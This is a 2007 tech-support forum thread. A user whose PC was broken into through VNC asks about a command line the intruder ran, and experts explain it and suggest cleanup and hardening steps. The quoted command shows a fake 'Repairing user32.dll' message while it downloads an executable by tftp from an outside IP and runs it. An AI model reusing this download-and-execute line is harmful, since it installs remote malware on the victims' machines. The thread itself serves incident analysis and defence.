Solved

What is this cmdline attempting to do ?

Posted on 2007-11-27
8
300 Views
Last Modified: 2013-11-16
Hi,

We recently had a PC hacked via Real VNC. The Hacker executed the following command line.

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&

Can anyone explain what this has done ?

Regards

Rob
0
Comment
Question by:ertnev74
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
8 Comments
 
LVL 40

Accepted Solution

by:
Richard Quadling earned 350 total points
ID: 20357105
%comspec%

This is telling the computer to run the command shell as identified by %COMSPEC%

At the dos prompt type SET and enter and you will see COMSPEC.
Normally cmd.exe or (older windows) command.com


/c

Tells the comspec to run a command and then quit.


echo Repairing user32.dll

Output to the screen.

&
echo Please wait...

output to the screen.



tftp -i 81.88.110.178 GET cffhvvct.exe

Use the program tftp to get a file called cffhvvct.exe from the IP address of 81.88.110.178


start cffhvvct

Run the program just downloaded.




If you don't know the name of the program or the FTP site, don't run it.

I've just tried downloading the file from that site but it timedout.

If it was a virus, then the site may have been blocked or something else.
0
 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 100 total points
ID: 20357113
Dear ertnev74,

Few weeks ago I got the same issue via VNC, it basically tries to dump 1.exe or 2.exe which is trojen. Basically search computer for virus and try to search 1.exe

U can manually end the process and renamed it and later delete it

Run the good antivirus softwares like Window Live Care or E-Wido

Read some more info
http://en.wikipedia.org/wiki/ComSpec
http://www.liutilities.com/products/wintaskspro/processlibrary/1/
0
 
LVL 40

Assisted Solution

by:Richard Quadling
Richard Quadling earned 350 total points
ID: 20357123
OK. Having read the question again.

Without having access to the program itself, absolutely ANYTHING could have happened.

I would STRONGLY recommend disconnecting the pc from the lan and running virus scanners and rootkit scanners.

SystemInternals Process Explorer (to see what is currently running and make sure YOU know it should be running).
SystemInternals RootKitRevealer (to see if any root kits exist).
SystemInternals AutoRuns (to see what is launched when the computer is turned on or when you login).
HijackThis is a similar program to AutoRuns, but produces a report which others can look at (http://www.spywareinfo.com/~merijn/programs.php)
0
Get Actionable Data from Your Monitoring Solution

Your communication platform is only as good as the relevance of the information you send. Ensure your alerts get to the right people every time with actionable responses. Create escalation rules that ensure everyone follows the process and nothing is left to chance.

 
LVL 47

Assisted Solution

by:rpggamergirl
rpggamergirl earned 50 total points
ID: 20357538
You could also try running some free scanners.
SUPERAntispyware:
http://www.superantispyware.com/

Download and install DrWebCureIt
http://www.freedrweb.com/

AVG Antispyware,
http://free.grisoft.com/doc/download-free-anti-spyware/us/frt/0


OR, run Combofix and upload the log for us to check.
Download ComboFix to your Desktop, from either of these locations:
http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Double click "combofix.exe" and follow the prompts.
When finished, it shall produce a log for you.
Upload the log at EE-Stuff.com for us to check please.
0
 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 100 total points
ID: 20357582
Sorry forgot to mentioned, always make sure that your firewall is turned on.
Or VNC Should be only enable as and when required.
If you can change the default port i.e. 5900 to some other ports would be helpful too, as this port is well known by hackers, so they just scan the port and enter into it.
I need this same thing with our guys and it solved my problem.

Now since the program has been executed on your machine, so better virus/spyware/trojen scan and then do the needful as above.
0
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20357691
So what the problem? Were you able to find out 1.exe ?
0
 

Author Comment

by:ertnev74
ID: 20358036
All, thanks for you assistance with this query.

The user saw some activity on his screen last Thursday around midday. I advised him to shut off his router. When I got to his PC he explained what he had seen. Clicking on Start > Run I found the above cmdline.  

I looked up 'VNC being hacked' on EE and found a few solutions to recitify the situation. Once I made the box secure running Spyware / AV / Process Scanners I then looked at the cause and possible damage.
The cmdline was the only thing I didn't understand.... but I do now :)

The AV Scan removed a few trojans and viruses so I'm not to sure if 1.exe was on the box, however I was able to trace the IP of the hacker back to America.

Thanks again.
0
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20359640
Thanks for the valuable feedback. The best is to make your windows firewall ON and keeps on Windows Patched !!!!
0

Featured Post

2017 Webroot Threat Report

MSPs: Get the facts you need to protect your clients.
The 2017 Webroot Threat Report provides a uniquely insightful global view into the analysis and discoveries made by the Webroot® Threat Intelligence Platform to provide insights on key trends and risks as seen by our users.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

In this post we will learn different types of Android Layout and some basics of an Android App.
Although it can be difficult to imagine, someday your child will have a career of his or her own. He or she will likely start a family, buy a home and start having their own children. So, while being a kid is still extremely important, it’s also …
In this fifth video of the Xpdf series, we discuss and demonstrate the PDFdetach utility, which is able to list and, more importantly, extract attachments that are embedded in PDF files. It does this via a command line interface, making it suitable …
Introduction to Processes

717 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question